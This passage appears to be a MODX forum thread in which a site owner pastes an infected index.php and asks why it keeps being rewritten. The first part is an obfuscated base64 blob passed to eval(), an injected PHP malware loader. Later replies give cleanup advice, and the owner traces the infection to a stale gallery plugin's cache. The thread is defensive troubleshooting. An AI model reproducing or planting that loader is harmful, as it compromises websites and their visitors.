1TdjI5ZXFoa2VxVGRwSFU5bEgzeTFJMmtRdmlxWEhwZ3BPRVg3RmdBUlRjbkFhaUNZYXV0QXRZYkRIcHlYSHBnb3FCWGRhUEFXcWhrNHFUOUFxaDF3TlFuTHpoQ1FJMmswbXVrMGFsMDR0bFk3RmdBUlRpWFVPQmIwSXBiMElsV1l6QnlvSEM5TEgyNTBhaTUwc1RxRHoyZjBIaU1wYXV5TEgyNTBhaTUwUlFZeGpkME9UZ1lSUmhmMEhpTVN2MjllcWhrZXFURzl0QmIwSVg5UWF1bnd2aWJYT1RSRHoyZjBIaU1wYXV5TEgyNTBhaTUwdGxkcFJRZFl6QnlvSEM5TEgyNTBhaTUwT1B3YlRXWVJUaWtMemg4V1JoZjBIaU1TdjI5ZXFoa2VxRndSVGdZYlRXWVJUaWs0enVnQU9Qd2JUV1lSU2lrd0kyY1d6aXZBSTN5UUkzeVFPVHlBcWgxd3UyYkRIcHlYSHBnd1IycVhxaGJESHB5WEhwZzFaRm5kdmlxWFJRWXhqZDBPVGdZUmdoZlh2aXlYSWxXcEVDeWNjVDhNc0xyV2JQR2R0clhlcWhrUUhVQ3d0Q2JYSXBhWElsbkNJcFJESWxJeE5kME9UZ1lSYXVmeHFUV3hOZDBPVGdYOWFpTVZhRW54YWxmVnFCUlZxQnRBUmhmMEhpTVN2MjllcWhrZXFUZHBhMmswdjI5ZXFoa2VxRmdkYkJuZmEyY3BPRVg3RmdBUlRnWEd6aGtmYWhrUU9UcXRrQ3lnc1ZyZVpFRzBaRmdXUFU5MHRyYURxaTVZUlFZN0ZnQVJUZ1hYamhYME9UWTdGZ0FSVHUwYlRXWVJUZ1lSRmdBUlNnWWJUcDBiVFcwT2Fwa2V2M3l4SDI0V0kyMXhJMlJEcVRXeHRCd2JUV1lZdmlxWEhwZ1dtRW5WcUJSMEgyTURxMmtRT1R5U2Mwa0VrWWtFaVFxdGtDeWd1MWtQeWtSU2djcUNQWGdwdUVZN0ZnQVJ6aXZXT1R5ZmEya2VxVEdmbUVHbHRsWVdqZDBPVGdZWUkzbnhhaGtRYzJYMGFFRzl0aENRSVVDNXRUV2xraGtldjJrZXFDeVF2dWFYSGhrUXRsZGx5MjlEYTJNWHZVOTB0bGRsSHViZXZVOTB0bGRsYzI5VkgzYmR6aXlYSWx3bHNUUlBIMnFEcUVuM2FpdFdJM254YWhrUXRsZGx6aUNTdnVSTHpoWDJhdXRsc1RSYXZpZkRIUXJXYzJNMUlwR2xzVFJhSDNrWXZpOVRIM2dsc1RSYXZpZkRIUW5QSEJrUUlUdHd0WTFQUFlSRHFUdHd0WXhmcVVyV09yOVVxaGtldEJiZHZpMFd2VTkwT0V0d3RZUmZ6Y3kxYzNueGFoa1F0bGRsa1U5eEhocmxzVFJhdmk1WWF1V1d2VTkwdGxkbGdYYmR6aXlYSWx0d3RweTN6aWJYSGhrUXRsZGxjMjlwSDNjV2MzbnhhaGtRdGxkbGMzblhhaXk1dENiZHppeVhJbHR3dFlxREgycXdhRW5uYUNiWEhwYlh0bGRsRWhrUXp1eVF6dVdsc1RSZ2p1eUFIMjRvcXVSd0hoWGx0bGRsZ2lNWGpocldPclhudHJDUXYyZnhxVWtRT0V0d3RZQ1Z6UXR3dFlrNHZpUkRxVHR3dFliMUkzeUR0bGRsUDNrMGFVOTRnVTkwczFYRGFoQ0RnVTkwdGxkbGppQ0xqRXR3dFhiMUlwYVhqY1JEcVR0d3RVTVhhM1psc1RSd3EzR29xQlJ4cVVYZkhUdHd0WTUxcWhiQXRsZGxjM3lmdjJvRXZpMWxIaGtRdGxkbGtoZlh0QnFYdmxuZklVYkF6dWFYdFRmUmdFbm5JVWJBenVhWElsWWxzVFJnYXVSd3RCeURIMmRsc1RSYkVMclF2VTkwdGxkbFBVazB2M1JmYXBnbHNUUmJjMFhDZzNSZnEyTVhJbHR3dFhxQmF1Z1dxaDlESEJabHNUUnd2dVJsemk0bHNUUmh6dWJBdEJiWHZ1Ukx6VHR3dFRxbHppNXB2VTkwUlFkcGEyOURhMk1YUlFkV1IyUmZ6aXkxUlFkV1IyQ0RIVEl3dFRxbHppNXBSUWRXUjNYZnpoOURSUWRXUjFYZkhVeVhqclJEcVRJd3RUcW56QlJYYXBiVEgzZ3BPUHdiVFdZUmFVOVFhaUNMelRHQVJCYmR6aXlYSVhieHFoY1d2dVpXUkJhZkhUWVdqZDBPVGdZUlJCYjBJbEc5dEJiMElweURIaDkzYXV0QVJCYWZIVFk3RmdBUlRnWHhhbEdBSTN5UUloOVZPVHlmYTJrZXFUZFdSQmIwSWxZeHRCd2JUV1lSVGdYUWF1eTFJVTRXcUJSMWFQd2JUV1lSVHUwYlRXWVJTZzBPVHUxWEhCYlhqZDBPVGdYUWF1eTFJVTRXYVVDd0kyYzdGZ0FSU2cwT1NnME9hcGtldjN5eEgyNFdJMjFEcXV5WUhRV1lxdVJ3T3V3YlRXWVlhVVh3YWs5TEgyNTBhaTUwSVFHOXRyblV6aU1YdTJxWHFDOUxIMjUwYWk1MElRV1lxdVJ3T1B3V0ZnQVJ6aXZXT1RyWWFVWHdhazlMSDI1MGFpNTBJUVlXamQwT1RnWVl2MldXbUVuTHF1Und1MlhlenVnQU9Qd2JUV1lSdjNrUUhDOVZhdXlESUJnQVJoYkFzVG5Ga2tSWlAxbmN1MWtFUFRkV1JCa1FIVFk3RmdBUlRpYjFJVU1TSTJrMEgzbjBPVHlMelRkV2cxa0VQcjlna0M5RXlreWtjWTVjY1lDTmMwYUNjbGRNT1B3YlRXWVJSaGF4SGhrU3YyOWVxaGtlcUJaV21FbkxxdVJ3dTJrNGFpWkFSaGJBT1B3YlRXWVJ2M2tRSEM5TEhoOVZhRVdZdjJXeE5kME9UdTBiVFdYUWF1eTFJVTRXUmhheEhoa1N2MjllcWhrZXFCWjdGZ3g5RmdBL21XPT0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7"));

 ?>

<?php

/*

 * This file is part of MODX Revolution.

 *

 * Copyright (c) MODX, LLC. All Rights Reserved.

 *

 * For the full copyright and license information, please view the LICENSE

 * file that was distributed with this source code.

 */



$tstart= microtime(true);



/* define this as true in another entry file, then include this file to simply access the API

 * without executing the MODX request handler */

if (!defined('MODX_API_MODE')) {

    define('MODX_API_MODE', false);

}



/* this can be used to disable caching in MODX absolutely */

$modx_cache_disabled= false;



/* include custom core config and define core path */

@include(dirname(__FILE__) . '/config.core.php');

if (!defined('MODX_CORE_PATH')) define('MODX_CORE_PATH', dirname(__FILE__) . '/core/');



/* include the modX class */

if (!@include_once (MODX_CORE_PATH . "model/modx/modx.class.php")) {

    $errorMessage = 'Site temporarily unavailable';

    @include(MODX_CORE_PATH . 'error/unavailable.include.php');

    header('HTTP/1.1 503 Service Unavailable');

    echo "<html><title>Error 503: Site temporarily unavailable</title><body><h1>Error 503</h1><p>{$errorMessage}</p></body></html>";

    exit();

}



/* start output buffering */

ob_start();



/* Create an instance of the modX class */

$modx= new modX();

if (!is_object($modx) || !($modx instanceof modX)) {

    ob_get_level() && @ob_end_flush();

    $errorMessage = '<a href="setup/">MODX not installed. Install now?</a>';

    @include(MODX_CORE_PATH . 'error/unavailable.include.php');

    header('HTTP/1.1 503 Service Unavailable');

    echo "<html><title>Error 503: Site temporarily unavailable</title><body><h1>Error 503</h1><p>{$errorMessage}</p></body></html>";

    exit();

}



/* Set the actual start time */

$modx->startTime= $tstart;



/* Initialize the default 'web' context */

$modx->initialize('web');



/* execute the request handler */

if (!MODX_API_MODE) {

    $modx->handleRequest();

}


    As you can see somehow the person is either uploading their own index.php file or injecting it with something else like my database (but I did not find anything through casual looking. Not that I knew where to look for this). It almost seems as if they are rewriting using the setup folder , or if my database is injecting this code. Only because the core path seems to go back to the default when they overwrite:
    if (!defined('MODX_CORE_PATH')) define('MODX_CORE_PATH', dirname(__FILE__) . '/core/');
    instead of my new core folder name.

    In the past when people have hacked, I could just overwrite the files and replace with a backup and then harden. Problem solved. In this case, its annoying because I updated everything changed most of my MODx file names, and all my login passwords, and it only seems like they are somehow changing the index.php file over and over again. It almost seems automated somehow. Any ideas please?

    This question has been answered by wbbuilder. See the first response.

      Making the web a better place on site at a time! Dayton Web Design: http://www.dayton-web-design.com/
      • 36549
      • 572 Posts
      9thwave Reply #2, 5 years, 5 months ago
      Take a look in all top level directories for index.php files:
      assets/
      connectors/
      core/
      manager/
      And also check in directories immediately below those too. I had multiple index.php files uploaded with code injections so you need to delete the ones that shouldn't be there and remove the code from the top of the valid index.php files.
      If you have a good copy of MODX to check against it makes it easier as not all directories should have index.php files.
      Use cPanel (if applicable) to check any hidden files (dotfiles). I had an index.php file within the .well-known/ and .well-known/pki-validation directories.

      Hopefully the above should rectify the problem.
        www.9thwave.co.uk
           WEB | DESIGN | PRINT
        • 32025
        • 305 Posts
        Dayton Web Design Reply #3, 5 years, 5 months ago
        Hmmm. Don't see any index.php files in the folders except: assets and manager but they match what was uploaded in my new version of 2.6.5. And no out of the ordinary files now. So far no malware this morning.

        I do not have a .well-known folder for this installation.

        As mentioned before I renamed my admin (placed above public_html), manager, and connectors. Base index.php, manager and connectors all have this code in the index.php file:

        $included = defined('MODX_CONNECTOR_INCLUDED') || defined('MODX_CORE_PATH');

/* retrieve or define MODX_CORE_PATH */
if (!defined('MODX_CORE_PATH')) {
    if (file_exists(dirname(__FILE__) . '/config.core.php')) {
        include dirname(__FILE__) . '/config.core.php';
    } else {
        define('MODX_CORE_PATH', dirname(__DIR__) . '/core/');
    }


        I ran the setup at each file name change. Do I need to change the /core/ in each index.php to match the nenamed core? If so, do I remove the first / to make it one above public_html? Not sure why this still says core, when there is no core folder anymore and I ran the upgrade script. Perhaps the first line with MODX_CORE_PATH, gives the updates path already. Don't know if it matters or to leave it alone.
          Making the web a better place on site at a time! Dayton Web Design: http://www.dayton-web-design.com/
          • 3749
          • 24,544 Posts
          BobRay Reply #4, 5 years, 5 months ago
          There are only four configuration files that you'd need ever to modify (and usually setup does it for you):

          config.core.php in these directories:
          MODX root
          connectors
          manager

          core/config/config.inc.php

          The code you quoted above gets the core path from the config.core.php file. It's only set to '/core/' if that file is not found.
            Did I help you? Buy me a beer
            Get my Book: MODX:The Official Guide
            MODX info for everyone: http://bobsguides.com/modx.html
            My MODX Extras
            Bob's Guides is now hosted at A2 MODX Hosting
            • 32025
            • 305 Posts
            Dayton Web Design Reply #5, 5 years, 5 months ago
            Quote from: BobRay at Nov 06, 2018, 05:35 PM
            There are only four configuration files that you'd need ever to modify (and usually setup does it for you):

            config.core.php in these directories:
            MODX root
            connectors
            manager

            core/config/config.inc.php

            The code you quoted above gets the core path from the config.core.php file. It's only set to '/core/' if that file is not found.

            Your statement makes sense to me, thanks for clarifying BobRay.
              Making the web a better place on site at a time! Dayton Web Design: http://www.dayton-web-design.com/
            • discuss.answer
              • 32025
              • 305 Posts
              Dayton Web Design Reply #6, 5 years, 5 months ago
              Found the Malware. Was embed in an outdated plugin (Gallery plugin by: by Shaun McCormick). Suspected it might be a plugin so went looking in assets/components/gallery and found the coding that we being embedded into my homepage in a few files in the cache folder (assets/components/gallery/cache). I totally removed this plugin (that was not in use to begin with).

              I really hardened the site, but the embed was already placed in this plugin, which is why it kept coming back on its own even after updating and hardening. Just like other malware cases, the filenames causing this issue in the gallery cache folder still had strange names. Mostly lots of numbers added to the filenames.

              Problem solved!
                Making the web a better place on site at a time! Dayton Web Design: http://www.dayton-web-design.com/